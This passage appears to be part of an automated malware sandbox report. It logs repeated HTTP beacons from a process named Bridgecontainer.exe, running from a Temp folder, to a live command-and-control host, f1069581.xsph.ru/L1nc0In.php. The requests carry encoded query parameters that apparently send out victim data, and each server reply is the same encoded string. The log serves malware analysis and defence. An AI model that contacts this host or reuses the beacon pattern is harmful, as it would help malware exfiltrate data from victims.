                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:19:58.234035015 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:58 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.550010141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:03.246721029 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:03.934907913 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:03 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.550011141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:08.952136040 CET2206OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:20:09.626683950 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:09 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.550012141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:14.637654066 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:15.312179089 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:15 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                37192.168.2.550013141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:20.328696966 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:21.045594931 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:20 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                38192.168.2.550014141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:26.064923048 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:26.739919901 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:26 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                39192.168.2.550015141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:31.762175083 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:32.641308069 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:32 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                40192.168.2.550016141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:37.653153896 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:20:38.330703974 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:38 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                41192.168.2.550017141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:20:43.340688944 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:20:44.018168926 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:20:43 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                42192.168.2.550018141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
